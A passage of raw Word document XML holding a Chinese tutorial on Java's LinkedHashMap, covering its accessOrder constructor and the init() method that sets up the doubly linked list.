          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则按照元素的插入顺序迭代！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>几个重要的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="26" name="图片 4" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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4"/>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 Constructs an empty &lt;tt&gt;LinkedHashMap&lt;/tt&gt; instance with the</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4"/>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 specified initial capacity, load factor and ordering mode.</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4"/>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4"/>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 @param  initialCapacity the initial capacity</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4"/>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 @param  loadFactor      the load factor</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4"/>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 @param  accessOrder     the ordering mode - &lt;tt&gt;true&lt;/tt&gt; for</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4"/>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         access-order, &lt;tt&gt;false&lt;/tt&gt; for insertion-order</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4"/>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 @throws IllegalArgumentException if the initial capacity is negative</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4"/>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         or the load factor is nonpositive</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4"/>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4"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> LinkedHashMap(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> initialCapacity, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> loadFactor, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> accessOrder)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(initialCapacity, loadFactor);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.accessOrder = accessOrder;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是不是很简单，也可参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://boy00fly.iteye.com/blog/1139845</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这篇文章的构造函数分析。其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>accessOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就是我们上面所讲的控制迭代顺序的开关，只有此构造函数有这个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00622217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其他的构造函数默认就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00622217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00622217">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>几个重要的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="23" name="图片 5" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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5"/>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 Called by superclass constructors and pseudoconstructors (clone,</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5"/>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 readObject) before any entries are inserted into the map.  Initializes</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5"/>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 the chain.</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5"/>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5"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> init()  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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header = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Entry&lt;K, V&gt;(-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</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5"/>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header.before = header.after = header;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此方法是在父类构造函数初始化的时候调用的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重写了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法。代码中表达的意思也很明确了，这是双向链表的初始化状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002860E7" w:rsidRPr="00F41A4C" w:rsidRDefault="002860E7" w:rsidP="002860E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
